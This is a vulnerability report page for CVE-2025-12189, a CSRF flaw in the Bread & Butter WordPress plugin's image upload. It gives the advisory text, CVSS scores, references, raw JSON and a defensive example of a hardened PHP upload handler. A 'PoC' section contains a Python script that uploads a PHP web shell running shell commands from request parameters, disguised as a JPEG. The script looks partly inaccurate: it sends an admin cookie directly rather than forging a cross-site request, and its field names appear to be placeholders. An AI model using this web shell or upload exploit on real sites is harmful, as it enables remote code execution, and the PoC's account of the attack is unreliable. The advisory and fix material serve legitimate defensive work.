Security Vulnerability Report
CVE-2025-12189 CVSS 4.3 MEDIUM

CVE-2025-12189

Published: 2025-12-05 06:16:07
Last Modified: 2026-04-08 19:23:11

Description

The Bread & Butter: Gate content + Capture leads + Collect first-party data + Nurture with Ai agents plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.11.1374. This is due to missing or incorrect nonce validation on the uploadImage() function. This makes it possible for unauthenticated attackers to upload arbitrary files that make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
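The fix for the bug class the description names is a server-side nonce check inside the AJAX handler itself, paired with a capability check and a content check that does not trust the client-supplied MIME type. The handler below is an added example written for this page, not the plugin's code: the action name example_upload_image and the nonce action example_upload_image_nonce are hypothetical, and the admin page is assumed to send a nonce minted with wp_create_nonce('example_upload_image_nonce') in the nonce field.

```php
<?php
// Added example (not the Bread & Butter plugin's code): a hardened WordPress
// AJAX image-upload handler. Action and nonce names are hypothetical.

add_action( 'wp_ajax_example_upload_image', 'example_upload_image_handler' );

function example_upload_image_handler() {
    // 1. Capability check. Registering only wp_ajax_ (not wp_ajax_nopriv_)
    //    already excludes logged-out callers, but a forged request rides the
    //    administrator's own session, so this alone does not stop CSRF.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 ); // wp_send_json_error() exits
    }

    // 2. CSRF check: the nonce must have been issued to this user for this
    //    action. A cross-site form cannot read it, so a forged POST fails here.
    //    Third argument false returns instead of die()-ing so we control output.
    if ( ! check_ajax_referer( 'example_upload_image_nonce', 'nonce', false ) ) {
        wp_send_json_error( 'invalid or missing nonce', 403 );
    }

    if ( empty( $_FILES['file'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( 'no file uploaded', 400 );
    }

    // 3. Content check: judge by extension AND magic bytes, never by the
    //    Content-Type the browser (or an attacker) attached to the part.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext( $_FILES['file']['tmp_name'], $_FILES['file']['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'file is not an allowed image type', 415 );
    }

    // 4. Let core move the file: it re-runs the type checks against $allowed
    //    and sanitizes the stored filename.
    $upload = wp_handle_upload( $_FILES['file'], array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( isset( $upload['error'] ) ) {
        wp_send_json_error( $upload['error'], 500 );
    }

    wp_send_json_success( array( 'url' => $upload['url'] ) );
}
```

For detection, a request to admin-ajax.php for this action that arrives without a nonce field, or whose nonce fails verification, is exactly the event the 403 branch above records; logging it with the referring Origin/Referer header is a cheap CSRF indicator.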

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

The 4.3 score is the Secondary metric in the record. The raw JSON data below also carries a Primary CVSS v3.1 metric, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, scored 8.8 HIGH.

Configurations (Affected Products)

cpe:2.3:a:breadbutter:bread_\&_butter:*:*:*:*:*:wordpress:*:* - VULNERABLE
Bread & Butter WordPress plugin <= 7.11.1374 (all versions up to and including 7.11.1374)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12189 PoC - CSRF to RCE in WordPress Bread & Butter Plugin
# Target: WordPress site with Bread & Butter plugin < 7.11.1374


def exploit_csrf_to_rce(target_url, admin_cookie):
    """
    This PoC demonstrates the CSRF vulnerability in uploadImage() function.
    Note: Requires social engineering to get admin to click the malicious link.
    """
    # Step 1: Create malicious PHP file for RCE
    php_shell = '''
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
'''

    # Step 2: Prepare multipart form data for file upload
    files = {
        'file': ('shell.php', php_shell, 'image/jpeg')
    }

    # Step 3: AJAX endpoint for uploadImage()
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Step 4: Missing nonce validation allows CSRF attack
    data = {
        'action': 'bread_butter_upload_image',
        'image_data': 'base64_encoded_image_data',
        'nonce': ''  # No nonce required due to missing validation
    }

    # Step 5: Send forged request with admin cookies
    headers = {
        'Cookie': admin_cookie,
        'User-Agent': 'Mozilla/5.0 (CSRF Exploit PoC)'
    }

    try:
        response = requests.post(ajax_url, files=files, data=data,
                                 headers=headers, timeout=10)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")

        # Step 6: If successful, access the uploaded shell
        if response.status_code == 200 and 'success' in response.text.lower():
            # Extract uploaded file path from response
            # Access: target_url/wp-content/uploads/bread-butter/shell.php?cmd=whoami
            print("[+] Exploit successful! Access shell at:")
            print(f"[+] {target_url}/wp-content/uploads/bread-butter/shell.php?cmd=whoami")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-12189.py <target_url> <admin_cookie>")
        sys.exit(1)
    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit_csrf_to_rce(target, cookie)
```

References

https://github.com/d0n601/CVE-2025-12189 (Exploit)
https://plugins.trac.wordpress.org/browser/bread-butter/trunk/src/Base/Ajax.php#L411 (Product)
https://plugins.trac.wordpress.org/changeset/3408692/bread-butter/trunk/src/Base/Ajax.php
https://ryankozak.com/posts/cve-2025-12189/ (Exploit)
https://www.wordfence.com/threat-intel/vulnerabilities/id/bb280004-e0ba-44c8-a205-8fec30900d86?source=cve (Third Party Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-12189", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:06.573", "lastModified": "2026-04-08T19:23:11.450", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Bread & Butter: Gate content + Capture leads + Collect first-party data + Nurture with Ai agents plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.11.1374. This is due to missing or incorrect nonce validation on the uploadImage() function. This makes it possible for unauthenticated attackers to upload arbitrary files that make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:breadbutter:bread_\\&_butter:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "7.11.1374", "matchCriteriaId": "630FA8D3-D849-4772-BC9E-8846EDFAA9D8"}]}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-12189", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://plugins.trac.wordpress.org/browser/bread-butter/trunk/src/Base/Ajax.php#L411", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3408692/bread-butter/trunk/src/Base/Ajax.php", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12189/", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bb280004-e0ba-44c8-a205-8fec30900d86?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/d0n601/CVE-2025-12189", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}
```